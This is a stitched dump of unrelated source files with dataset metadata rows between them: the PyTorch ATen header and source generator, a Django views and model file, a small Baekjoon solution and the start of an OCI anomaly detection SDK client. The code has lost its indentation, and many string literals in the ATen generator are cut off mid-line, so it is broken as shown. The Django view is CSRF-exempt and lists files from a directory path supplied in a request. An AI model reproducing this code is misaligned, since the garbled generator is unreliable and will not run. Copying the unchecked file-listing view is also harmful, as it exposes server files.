# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def get_custom_build_selector(
provided_op_registration_allowlist: Optional[List[str]],
op_selection_yaml_path: Optional[str]) -> SelectiveBuilder:
assert not (
provided_op_registration_allowlist is not None and
op_selection_yaml_path is not None), (
"Both provided_op_registration_allowlist and " +
"op_selection_yaml_path can NOT be provided at the " +
"same time.")
op_registration_allowlist: Optional[Set[str]] = None
if provided_op_registration_allowlist is not None:
op_registration_allowlist = set(provided_op_registration_allowlist)
if op_registration_allowlist is not None:
selector = SelectiveBuilder.from_legacy_op_registration_allow_list(
op_registration_allowlist,
True,
False,
)
elif op_selection_yaml_path is not None:
selector = SelectiveBuilder.from_yaml_path(op_selection_yaml_path)
else:
selector = SelectiveBuilder.get_nop_selector()
return selector
def pre_group_native_functions(
native_functions: Sequence[NativeFunction]) -> Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]]:
pre_grouped_native_functions: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = defaultdict(dict)
for f in native_functions:
d = pre_grouped_native_functions[f.func.signature()]
assert f.func.kind() not in d
d[f.func.kind()] = f
return pre_grouped_native_functions
def get_grouped_native_functions(
native_functions: Sequence[NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
def flatten_pre_group(d: Dict[SchemaKind, NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
r = NativeFunctionsGroup.from_dict(d)
if r is None:
return list(d.values())
else:
return [r]
# TODO: how come ValuesView isn't a Sequence lol
pre_grouped_native_functions = pre_group_native_functions(native_functions)
return list(concatMap(flatten_pre_group, list(pre_grouped_native_functions.values())))
def gen_aggregated_headers(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
cpu_fm: FileManager,
cuda_fm: FileManager,
functions_keys: Set[DispatchKey],
dispatch_keys: Sequence[DispatchKey],
rocm: bool,
) -> None:
# headers into a single file
structured_native_functions = [g for g in grouped_native_functions
if isinstance(g, NativeFunctionsGroup)]
cpu_fm.write('NativeMetaFunctions.h', lambda: {
'NativeMetaFunctions_includes': [],
'NativeMetaFunctions_declarations': list(
mapMaybe(compute_meta_function_declaration, structured_native_functions)),
})
method_native_functions = [fn for fn in native_functions
if Variant.method in fn.variants]
non_method_native_functions = [fn for fn in native_functions
if fn not in method_native_functions]
cpu_fm.write('MethodOperators.h', lambda: {
'MethodOperators_includes': [],
'MethodOperators_declarations': list(mapMaybe(ComputeOperators(
Target.DECLARATION), method_native_functions)),
})
cpu_fm.write('Operators.h', lambda: {
'Operators_includes': ['
'Operators_declarations': list(mapMaybe(ComputeOperators(
Target.DECLARATION), non_method_native_functions)),
})
cpu_fm.write('Functions.h', lambda: {
'static_dispatch_extra_headers': static_dispatch_extra_headers(static_dispatch_idx),
'Functions_includes': ['
'Functions_declarations': list(mapMaybe(ComputeFunction(
static_dispatch_backend_index=static_dispatch_idx), native_functions)),
})
cpu_fm.write('NativeFunctions.h', lambda: {
'NativeFunctions_includes': ['
'NativeFunctions_declarations': list(concatMap(
# Convert to a set first to remove duplicate kernel names.
# Backends are allowed to repeat kernel names; only generate the declaration once!
lambda f: list(OrderedDict.fromkeys(concatMap(
lambda backend_idx:
dest.compute_native_function_declaration(f, backend_idx),
backend_indices.values()))),
grouped_native_functions)),
})
for dispatch_key in dispatch_keys:
fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
if dispatch_key in functions_keys:
if dispatch_key in static_dispatch_keys(static_dispatch_idx):
# See Note [Avoiding Include Cycles In Static Dispatch]
inl_headers = ''
else:
inl_headers = f'
fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
'dispatch_key': str(dispatch_key),
'inline_headers_for_nonstatic_build': inl_headers,
})
fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
'DispatchKeyFunctions_inl_includes': [],
'dispatch_namespace': dispatch_key.lower(),
'dispatch_namespaced_declarations': list(concatMap(
dest.RegisterDispatchKey(
backend_indices[dispatch_key],
Target.NAMESPACED_DECLARATION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
})
del fm
def gen_per_operator_headers(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
cpu_fm: FileManager,
cuda_fm: FileManager,
ops_fm: FileManager,
functions_keys: Set[DispatchKey],
dispatch_keys: Sequence[DispatchKey],
rocm: bool,
) -> None:
# For CMake builds, split operator declarations into separate headers in
# the ATen/ops folder to split up header dependencies
functions_by_root_name: Dict[str, List[NativeFunction]] = defaultdict(lambda: [])
for fn in native_functions:
functions_by_root_name[fn.root_name].append(fn)
grouped_functions_by_root_name: Dict[str, List[Union[NativeFunction, NativeFunctionsGroup]]] = defaultdict(lambda: [])
for group in grouped_native_functions:
name = group.root_name
grouped_functions_by_root_name[name].append(group)
for name, functions in functions_by_root_name.items():
ops_fm.write_with_template(
f'{name}_ops.h', 'Operator.h', lambda: {
'declarations': list(mapMaybe(ComputeOperators(
Target.DECLARATION), functions)),
})
ops_fm.write_with_template(
f'{name}.h', 'Function.h', lambda: {
'static_dispatch_ops_headers': list(mapMaybe(
lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
functions)),
'operator_includes': f'
'function_definitions': list(mapMaybe(ComputeFunction(
static_dispatch_backend_index=static_dispatch_idx), functions)),
})
grouped_functions = grouped_functions_by_root_name.get(name, [])
structured_functions = [fn for fn in grouped_functions
if isinstance(fn, NativeFunctionsGroup) and fn.structured]
is_structured = len(structured_functions) > 0
if is_structured:
ops_fm.write_with_template(
f'{name}_meta.h', 'NativeMetaFunction.h', lambda: {
'meta_function_declarations': list(mapMaybe(
compute_meta_function_declaration, structured_functions)),
})
ops_fm.write_with_template(
f'{name}_native.h', 'NativeFunction.h', lambda: {
'extra_includes': (f'
if is_structured else []),
'native_function_declarations': list(concatMap(
# Convert to a set first to remove duplicate kernel names.
# Backends are allowed to repeat kernel names; only generate the declaration once!
lambda f: list(OrderedDict.fromkeys(concatMap(
lambda backend_idx:
dest.compute_native_function_declaration(f, backend_idx),
backend_indices.values()))),
grouped_functions)),
})
for category, suffix in [
('Functions', ''),
('Operators', '_ops'),
('NativeMetaFunctions', '_meta'),
('NativeFunctions', '_native'),
]:
cpu_fm.write(f'{category}.h', lambda: {
'static_dispatch_extra_headers': [],
f'{category}_includes': [
f'
for name in sorted(functions_by_root_name.keys())
],
f'{category}_declarations': [],
})
for dispatch_key in dispatch_keys:
if dispatch_key not in functions_keys:
continue
dispatch_namespace = dispatch_key.lower()
dispatch_names = []
for name, functions in functions_by_root_name.items():
grouped_functions = grouped_functions_by_root_name.get(name, [])
declarations = list(concatMap(
dest.RegisterDispatchKey(
backend_indices[dispatch_key],
Target.NAMESPACED_DECLARATION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_functions
))
if len(declarations) == 0:
continue
dispatch_names.append(name)
ops_fm.write_with_template(
f'{name}_{dispatch_namespace}_dispatch.h',
'DispatchKeyFunction.h', lambda: {
'dispatch_namespace': dispatch_namespace,
'dispatch_namespaced_declarations': declarations,
})
fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
if dispatch_key in static_dispatch_keys(static_dispatch_idx):
# See Note [Avoiding Include Cycles In Static Dispatch]
inl_headers = ''
else:
inl_headers = f'
fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
'dispatch_key': str(dispatch_key),
'inline_headers_for_nonstatic_build': inl_headers,
})
fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
'dispatch_namespace': dispatch_namespace,
'DispatchKeyFunctions_inl_includes': [
f'
for name in sorted(dispatch_names)
],
'dispatch_namespaced_declarations': [],
})
del fm
cpu_fm.write('MethodOperators.h', lambda: {
'MethodOperators_includes': sorted(
f'
for name, functions in functions_by_root_name.items()
if any(Variant.method in fn.variants for fn in functions)
),
'MethodOperators_declarations': [],
})
def gen_headers(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
core_fm: FileManager,
cpu_fm: FileManager,
cuda_fm: FileManager,
ops_fm: FileManager,
dispatch_keys: Sequence[DispatchKey],
functions_keys: Set[DispatchKey],
rocm: bool,
per_operator_headers: bool,
) -> None:
if per_operator_headers:
gen_per_operator_headers(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
ops_fm=ops_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=rocm,
)
else:
gen_aggregated_headers(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=rocm,
)
def static_dispatch_method_headers() -> List[str]:
return list(mapMaybe(
lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
[fn for fn in native_functions if Variant.method in fn.variants]))
core_fm.write('TensorBody.h', lambda: {
'static_dispatch_ops_headers': (
static_dispatch_method_headers() if per_operator_headers
else static_dispatch_extra_headers(static_dispatch_idx, skip_tensor_include=True)),
'tensor_method_declarations': list(mapMaybe(ComputeTensorMethod(
target=Target.DECLARATION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
'tensor_method_definitions': list(mapMaybe(ComputeTensorMethod(
target=Target.DEFINITION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
})
cpu_fm.write('RedispatchFunctions.h', lambda: {
'function_redispatch_definitions': list(mapMaybe(ComputeRedispatchFunction(), native_functions)),
})
cpu_fm.write('RegistrationDeclarations.h', lambda: {
'registration_declarations': [compute_registration_declarations(f, backend_indices) for f in native_functions],
})
cpu_fm.write('FunctionalInverses.h', lambda: {
'view_inverse_declarations': list(mapMaybe(gen_functionalization_view_inverse_declaration, native_functions))
})
def gen_aten_interned_strings() -> Dict[str, str]:
attrs = set() # All function argument names
names = set() # All ATen function names
for func in native_functions:
names.add(str(func.func.name.name))
# Some operators don't have a functional variant but we still create a
names.add(func.func.name.name.base)
for arg in func.func.schema_order_arguments():
attrs.add(arg.name)
# https://en.cppreference.com/w/cpp/language/operator_alternative
names -= set(['and', 'and_eq', 'bitand', 'bitor', 'compl', 'not',
'not_eq', 'or', 'or_eq', 'xor', 'xor_eq'])
return {
'aten_symbols': ' \\\n'.join([
f"_(aten, {name})" for name in sorted(names)
]),
'attr_symbols': ' \\\n'.join([
f"_(attr, {name})" for name in sorted(attrs)
]),
}
core_fm.write('aten_interned_strings.h', gen_aten_interned_strings)
def gen_source_files(
*,
native_functions: Sequence[NativeFunction],
grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
static_dispatch_idx: Optional[BackendIndex],
selector: SelectiveBuilder,
backend_indices: Dict[DispatchKey, BackendIndex],
core_fm: FileManager,
cpu_fm: FileManager,
cuda_fm: FileManager,
dispatch_keys: Sequence[DispatchKey],
functions_keys: Set[DispatchKey],
rocm: bool,
force_schema_registration: bool,
per_operator_headers: bool,
) -> None:
extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
if rocm:
extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''
for dispatch_key in dispatch_keys:
fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
if per_operator_headers:
def operator_headers() -> List[str]:
headers = []
for fn in native_functions:
is_registered = backend_index.has_kernel(fn) or (
fn.structured and dispatch_key in
(DispatchKey.Meta, DispatchKey.CompositeExplicitAutograd))
if not is_registered:
continue
headers.append(f"#include <ATen/ops/{fn.root_name}_native.h>")
if dispatch_key == DispatchKey.CompositeExplicitAutograd:
headers.append(f"#include <ATen/ops/{fn.root_name}.h>")
if dispatch_key in functions_keys:
headers.append(
f"#include <ATen/ops/{fn.root_name}_{dispatch_namespace}_dispatch.h>")
return sorted(set(headers))
else:
def operator_headers() -> List[str]:
headers = ["#include <ATen/NativeFunctions.h>"]
if dispatch_key == DispatchKey.CompositeExplicitAutograd:
headers.append("#include <ATen/Functions.h>")
if dispatch_key in functions_keys:
headers.append(f"#include <ATen/{dispatch_key!s}Functions.h>")
return headers
backend_index = backend_indices[dispatch_key]
dispatch_namespace = str(dispatch_key).lower()
fm.write_with_template(f'Register{dispatch_key}.cpp', 'RegisterDispatchKey.cpp', lambda: {
'extra_cuda_headers': extra_cuda_headers if is_cuda_dispatch_key(dispatch_key) else '',
'external_backend_headers': '',
'dispatch_headers': dest.gen_registration_headers(backend_index, per_operator_headers, rocm),
'ops_headers': operator_headers(),
'DispatchKey': dispatch_key,
'dispatch_namespace': dispatch_key.lower(),
'dispatch_helpers': dest.gen_registration_helpers(backend_index),
'dispatch_namespaced_definitions': list(concatMap(
dest.RegisterDispatchKey(
backend_index,
Target.NAMESPACED_DEFINITION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
'dispatch_anonymous_definitions': list(concatMap(
dest.RegisterDispatchKey(
backend_index,
Target.ANONYMOUS_DEFINITION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
'dispatch_registrations': list(concatMap(
dest.RegisterDispatchKey(
backend_index,
Target.REGISTRATION,
selector,
rocm=rocm,
cpp_namespace='at::native',
class_method_name=None),
grouped_native_functions
)),
})
# BackendSelect is generated specially
def gen_backend_select() -> Dict[str, List[str]]:
relevant_fns = [fn for fn in native_functions if needs_backend_select(fn, selector)]
return {
'ops_headers': [f'
'backend_select_method_definitions':
list(mapMaybe(ComputeBackendSelect(Target.DEFINITION, selector), relevant_fns)),
'backend_select_function_registrations':
list(mapMaybe(ComputeBackendSelect(Target.REGISTRATION, selector), relevant_fns)),
}
cpu_fm.write('RegisterBackendSelect.cpp', gen_backend_select)
schema_selector = selector
if force_schema_registration:
schema_selector = SelectiveBuilder.get_nop_selector()
cpu_fm.write('RegisterSchema.cpp', lambda: {
'schema_registrations': list(mapMaybe(RegisterSchema(schema_selector), native_functions)),
})
def key_func(fn: Union[NativeFunction, NativeFunctionsGroup]) -> str:
return fn.root_name
cpu_fm.write_sharded(
'Operators.cpp',
native_functions,
key_fn=key_func,
env_callable=lambda fn: {
'operator_headers': [f'
'definitions': [ComputeOperators(Target.DEFINITION)(fn)]},
num_shards=5,
sharded_keys={'operator_headers', 'definitions'}
)
cpu_fm.write('Functions.cpp', lambda: {})
core_fm.write('TensorMethods.cpp', lambda: {})
core_fm.write('ATenOpList.cpp', lambda: {
'aten_ops': list(mapMaybe(compute_aten_op, native_functions)),
})
# We need to easily map from [inplace_op_name] -> [functional_op] for the functionalization pass,
# so here I generate a mapping from every operator name to its corresponding functional NativeFunction (if it exist).
pre_grouped_d: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = pre_group_native_functions(native_functions)
to_functional_op: Dict[OperatorName, Optional[NativeFunction]] = {
k: v for d in [
{f.func.name: pre_grouped_d[func][SchemaKind.functional]
if SchemaKind.functional in pre_grouped_d[func].keys() else None
for f in pre_grouped_d[func].values()}
for func in pre_grouped_d.keys()]
for k, v in d.items()
}
def functionalization_env_callable(
g: Union[NativeFunction, NativeFunctionsGroup]
) -> Dict[str, List[str]]:
functions = [g] if isinstance(g, NativeFunction) else list(g.functions())
functions_needing_functionalization = [
fn for fn in functions if needs_functionalization(selector, fn)]
return {
'ops_headers': ([
f"#include <ATen/ops/{functions[0].root_name}_native.h>",
f"#include <ATen/ops/{functions[0].root_name}_ops.h>",
] if functions_needing_functionalization else []),
'func_definitions': list(mapMaybe(
lambda f: gen_functionalization_definition(selector, f, to_functional_op[f.func.name]),
functions_needing_functionalization)),
'func_registrations': list(mapMaybe(
lambda f: gen_functionalization_registration(
selector, f, backend_indices[DispatchKey.CompositeImplicitAutograd]),
functions_needing_functionalization)),
}
cpu_fm.write_sharded(
'RegisterFunctionalization.cpp',
grouped_native_functions,
key_fn=key_func,
env_callable=functionalization_env_callable,
num_shards=4,
sharded_keys={'ops_headers', 'func_definitions', 'func_registrations'}
)
def gen_declarations_yaml(
cpu_fm: FileManager,
native_functions: Sequence[NativeFunction]) -> None:
cpu_fm.write('Declarations.yaml', lambda:
format_yaml([compute_declaration_yaml(f) for f in native_functions]))
def main() -> None:
parser = argparse.ArgumentParser(description='Generate ATen source files')
parser.add_argument(
'-s',
'--source-path',
help='path to source directory for ATen',
default='aten/src/ATen')
parser.add_argument(
'-o',
'--output-dependencies',
help='output a list of dependencies into the given file and exit')
parser.add_argument(
'--dry-run', action='store_true',
help='run without writing any files (still updates outputs)')
parser.add_argument(
'--per-operator-headers', action='store_true',
help='generate separate headers per operator in ATen/ops')
parser.add_argument(
'-d', '--install_dir', help='output directory',
default='build/aten/src/ATen')
parser.add_argument(
'--rocm',
action='store_true',
help='reinterpret CUDA as ROCm/HIP and adjust filepaths accordingly')
# TODO: --op_registration_whitelist will be removed when all call-sites
# for gen.py are moved over to using the operator YAML file for mobile
# custom build.
parser.add_argument(
'--op_registration_whitelist',
nargs='*',
help='filter op registrations by the whitelist (if set); '
'each item is `namespace`::`operator name` without overload name; '
'e.g.: aten::empty aten::conv2d ...')
parser.add_argument(
'--op_selection_yaml_path',
help='Provide a path to the operator selection (for custom build) YAML '
'that contains the information about the set of selected operators '
'and their categories (training, ...). Each operator is either a '
'full operator name with overload or just a bare operator name. '
'The operator names also contain the namespace prefix (e.g. aten::)')
parser.add_argument(
'--backend_whitelist',
nargs='*',
help='filter dispatch backend by the whitelist (if set), '
'e.g.: CPU CUDA QuantizedCPU ...')
parser.add_argument(
'--static_dispatch_backend',
help='generate static dispatch code for the specific backend (if set)')
parser.add_argument(
'--force_schema_registration',
action='store_true',
help='force it to generate schema-only registrations for all ops, including'
'those that are not listed on --op_registration_whitelist')
parser.add_argument(
'--generate',
type=str,
nargs='*',
choices=['headers', 'sources', 'declarations_yaml'],
default=['headers', 'sources', 'declarations_yaml'],
help='Generate only a subset of files')
options = parser.parse_args()
selector = get_custom_build_selector(
options.op_registration_whitelist,
options.op_selection_yaml_path,
)
native_yaml_path = os.path.join(options.source_path, 'native/native_functions.yaml')
parsed_yaml = parse_native_yaml(native_yaml_path)
native_functions, backend_indices = parsed_yaml.native_functions, parsed_yaml.backend_indices
grouped_native_functions = get_grouped_native_functions(native_functions)
template_dir = os.path.join(options.source_path, "templates")
# NB: It is mandatory to NOT use os.path.join here, as the install directory
# will eventually be ingested by cmake, which does not respect Windows style
# path slashes. If you switch this to use os.path.join, you'll get an error
core_install_dir = f'{options.install_dir}/core'
pathlib.Path(core_install_dir).mkdir(parents=True, exist_ok=True)
ops_install_dir = f'{options.install_dir}/ops'
pathlib.Path(ops_install_dir).mkdir(parents=True, exist_ok=True)
def make_file_manager(install_dir: str) -> FileManager:
return FileManager(install_dir=install_dir, template_dir=template_dir, dry_run=options.dry_run)
core_fm = make_file_manager(core_install_dir)
cpu_fm = make_file_manager(options.install_dir)
cuda_fm = make_file_manager(options.install_dir)
ops_fm = make_file_manager(ops_install_dir)
extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
if options.rocm:
extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''
dispatch_keys = [
DispatchKey.CPU,
DispatchKey.SparseCPU,
DispatchKey.SparseCsrCPU,
DispatchKey.MkldnnCPU,
DispatchKey.CUDA,
DispatchKey.SparseCUDA,
DispatchKey.SparseCsrCUDA,
DispatchKey.QuantizedCPU,
DispatchKey.QuantizedCUDA,
DispatchKey.CompositeImplicitAutograd,
DispatchKey.CompositeExplicitAutograd,
DispatchKey.Meta,
DispatchKey.ZeroTensor,
]
functions_keys = {
DispatchKey.CPU,
DispatchKey.CUDA,
DispatchKey.CompositeImplicitAutograd,
DispatchKey.CompositeExplicitAutograd,
DispatchKey.Meta,
}
if options.backend_whitelist:
dispatch_keys = [k for k in dispatch_keys if is_generic_dispatch_key(k) or str(k) in options.backend_whitelist]
static_dispatch_idx: Optional[BackendIndex] = None
if options.static_dispatch_backend:
static_dispatch_idx = backend_indices[DispatchKey.parse(options.static_dispatch_backend)]
if 'sources' in options.generate:
gen_source_files(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
core_fm=core_fm,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=options.rocm,
force_schema_registration=options.force_schema_registration,
per_operator_headers=options.per_operator_headers,
)
if 'headers' in options.generate:
gen_headers(
native_functions=native_functions,
grouped_native_functions=grouped_native_functions,
static_dispatch_idx=static_dispatch_idx,
selector=selector,
backend_indices=backend_indices,
core_fm=core_fm,
cpu_fm=cpu_fm,
cuda_fm=cuda_fm,
ops_fm=ops_fm,
dispatch_keys=dispatch_keys,
functions_keys=functions_keys,
rocm=options.rocm,
per_operator_headers=options.per_operator_headers,
)
if 'declarations_yaml' in options.generate:
gen_declarations_yaml(
native_functions=native_functions,
cpu_fm=cpu_fm)
if options.output_dependencies:
depfile_path = pathlib.Path(options.output_dependencies).resolve()
depfile_name = depfile_path.name
depfile_stem = depfile_path.stem
for fm, prefix in [
(cpu_fm, ""),
(core_fm, "core_"),
(cuda_fm, "cuda_"),
(ops_fm, "ops_"),
]:
varname = prefix + depfile_stem
path = depfile_path.parent / (prefix + depfile_name)
fm.write_outputs(varname, str(path))
if __name__ == '__main__':
main()
| true | true |
1c2c83d541ec61b48477e9434ffd2529d76000e1 | 720 | py | Python | diplomova_praca/shared/views.py | MDobransky/thesis-grizzly | b038b477596879465636eae34444d70742a86e8f | [
"MIT"
] | 1 | 2020-07-28T18:38:19.000Z | 2020-07-28T18:38:19.000Z | diplomova_praca/shared/views.py | JankaSvK/thesis-grizzly | c0e573cd01008003c7d67e093c698ebf2d668f04 | [
"MIT"
] | 1 | 2020-09-21T21:38:46.000Z | 2020-09-21T21:38:46.000Z | diplomova_praca/shared/views.py | MDobransky/thesis-grizzly | b038b477596879465636eae34444d70742a86e8f | [
"MIT"
] | 1 | 2020-08-20T18:52:13.000Z | 2020-08-20T18:52:13.000Z | from pathlib import Path
from typing import Set
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from diplomova_praca_lib.position_similarity.models import PositionMethod
from diplomova_praca_lib.position_similarity.position_similarity_request import available_images
from shared.utils import dir_files
@csrf_exempt
def video_images(request):
src = request.POST.get('src', '')
print(src)
files = [{"img_src": '/' + str(path)} for path in dir_files(Path(src[1:]).parent)]
return JsonResponse({'files': files}, status=200)
@csrf_exempt
def images_loaded_in_dataset(method:PositionMethod) -> Set[str]:
return available_images(method)
| 31.304348 | 97 | 0.761111 | from pathlib import Path
from typing import Set
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from diplomova_praca_lib.position_similarity.models import PositionMethod
from diplomova_praca_lib.position_similarity.position_similarity_request import available_images
from shared.utils import dir_files
@csrf_exempt
def video_images(request):
src = request.POST.get('src', '')
print(src)
files = [{"img_src": '/' + str(path)} for path in dir_files(Path(src[1:]).parent)]
return JsonResponse({'files': files}, status=200)
@csrf_exempt
def images_loaded_in_dataset(method:PositionMethod) -> Set[str]:
return available_images(method)
| true | true |
1c2c84ba962513758acd36c71af378ec70598821 | 828 | py | Python | paperlims/core/models/experiment_data_file.py | slohr/paperlims | 598899b3a0945d9e7353ba79742bd94798b3e17b | [
"MIT"
] | null | null | null | paperlims/core/models/experiment_data_file.py | slohr/paperlims | 598899b3a0945d9e7353ba79742bd94798b3e17b | [
"MIT"
] | 1 | 2020-06-05T17:32:56.000Z | 2020-06-05T17:32:56.000Z | paperlims/core/models/experiment_data_file.py | slohr/paperlims | 598899b3a0945d9e7353ba79742bd94798b3e17b | [
"MIT"
] | null | null | null | import os.path
from django.db import models
from polymorphic.models import PolymorphicModel
from core.models.base import Base
from core.models.base import UniqueFileSystemStorage
from core import constants
from core.models import Experiment
class ExperimentDataFile(PolymorphicModel,Base):
experiment = models.ForeignKey(Experiment)
class Meta:
app_label = "core"
db_table = 'experiment_data_file'
ordering = ['-date_created']
def filename(self):
return os.path.basename(self.file.name)
def get_upload_path(instance, filename):
return os.path.join(
"{0}/{1}/{2}".format(constants.EXPERIMENT_DATA_FILES,instance.experiment.id,filename)
)
file = models.FileField(upload_to=get_upload_path,storage=UniqueFileSystemStorage())
def __str__(self):
return self.filename()
| 25.090909 | 91 | 0.754831 | import os.path
from django.db import models
from polymorphic.models import PolymorphicModel
from core.models.base import Base
from core.models.base import UniqueFileSystemStorage
from core import constants
from core.models import Experiment
class ExperimentDataFile(PolymorphicModel,Base):
experiment = models.ForeignKey(Experiment)
class Meta:
app_label = "core"
db_table = 'experiment_data_file'
ordering = ['-date_created']
def filename(self):
return os.path.basename(self.file.name)
def get_upload_path(instance, filename):
return os.path.join(
"{0}/{1}/{2}".format(constants.EXPERIMENT_DATA_FILES,instance.experiment.id,filename)
)
file = models.FileField(upload_to=get_upload_path,storage=UniqueFileSystemStorage())
def __str__(self):
return self.filename()
| true | true |
1c2c85d149efb259a9d59cc01ff04e725439b7a9 | 286 | py | Python | BAEKJOON/Python/2798.py | cmsong111/NJ_code | 2df6176d179e168a2789a825ddeb977a82eb8d97 | [
"MIT"
] | null | null | null | BAEKJOON/Python/2798.py | cmsong111/NJ_code | 2df6176d179e168a2789a825ddeb977a82eb8d97 | [
"MIT"
] | null | null | null | BAEKJOON/Python/2798.py | cmsong111/NJ_code | 2df6176d179e168a2789a825ddeb977a82eb8d97 | [
"MIT"
] | null | null | null | import itertools
#입력부
a,b = map(int,input().split())
lis = list(map(int,input().split()))
#리스트 추가
num = list(itertools.permutations(lis, 3))
final_list = []
#경우의수 다 찾기
for i in range(len(num)):
if sum(num[i]) <= b:
final_list.append(sum(num[i]))
print(max(final_list))
| 15.888889 | 42 | 0.632867 | import itertools
a,b = map(int,input().split())
lis = list(map(int,input().split()))
num = list(itertools.permutations(lis, 3))
final_list = []
for i in range(len(num)):
if sum(num[i]) <= b:
final_list.append(sum(num[i]))
print(max(final_list))
| true | true |
1c2c86346e240ca3d1809f76577a678fc96c78c5 | 142,252 | py | Python | src/oci/ai_anomaly_detection/anomaly_detection_client.py | CentroidChef/oci-python-sdk | fa406e27a52b40c70e220c20f52dfe2abe6236a3 | [
"Apache-2.0",
"BSD-3-Clause"
] | 249 | 2017-09-11T22:06:05.000Z | 2022-03-04T17:09:29.000Z | src/oci/ai_anomaly_detection/anomaly_detection_client.py | CentroidChef/oci-python-sdk | fa406e27a52b40c70e220c20f52dfe2abe6236a3 | [
"Apache-2.0",
"BSD-3-Clause"
] | 228 | 2017-09-11T23:07:26.000Z | 2022-03-23T10:58:50.000Z | src/oci/ai_anomaly_detection/anomaly_detection_client.py | CentroidChef/oci-python-sdk | fa406e27a52b40c70e220c20f52dfe2abe6236a3 | [
"Apache-2.0",
"BSD-3-Clause"
] | 224 | 2017-09-27T07:32:43.000Z | 2022-03-25T16:55:42.000Z | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry, circuit_breaker # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import ai_anomaly_detection_type_mapping
missing = Sentinel("Missing")
class AnomalyDetectionClient(object):
"""
OCI AI Service solutions can help Enterprise customers integrate AI into their products immediately by using our proven,
pre-trained/custom models or containers, and without a need to set up in house team of AI and ML experts.
This allows enterprises to focus on business drivers and development work rather than AI/ML operations, shortening the time to market.
"""
def __init__(self, config, **kwargs):
"""
Creates a new service client
:param dict config:
Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
The :py:meth:`~oci.config.from_file` method can be used to load configuration from a file. Alternatively, a ``dict`` can be passed. You can validate_config
the dict using :py:meth:`~oci.config.validate_config`
:param str service_endpoint: (optional)
